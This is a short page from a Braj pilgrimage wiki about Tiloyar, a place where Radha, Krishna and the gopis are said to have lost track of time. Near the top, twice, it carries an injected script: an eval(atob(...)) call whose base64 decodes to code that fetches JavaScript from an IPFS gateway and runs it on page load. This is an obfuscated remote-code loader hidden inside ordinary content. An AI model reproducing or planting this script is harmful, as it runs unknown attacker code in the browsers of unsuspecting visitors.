Tiloyar
Jump to navigation
Jump to search
Introduction | Index | Marvels | Books | People | Establishments | Freedom Fighter | Image Gallery | Video
This website is under construction please visit our Hindi website "HI.BRAJDISCOVERY.ORG"
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
This page is not complete. You can help us to prepare this page. |
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
Tiloyar / तिलोयार
- Here, Radha and Krishna and the sakhis became so absorbed in their playful pastimes that they entirely forgot to eat, what to speak of to return home.
- Vrinda devi finally reminded them to go home.
- This place became known as Tiloyar because here Krishna and the gopis were not even slightly conscious of the passing of time.
- Tilamatra means "very slightly" and is used in Hindi to denote a very slight measurement of time or space.
- Tiloyar is also situated on the border of Braj Mandal.
- Muslims of the meva caste reside in the villages around here.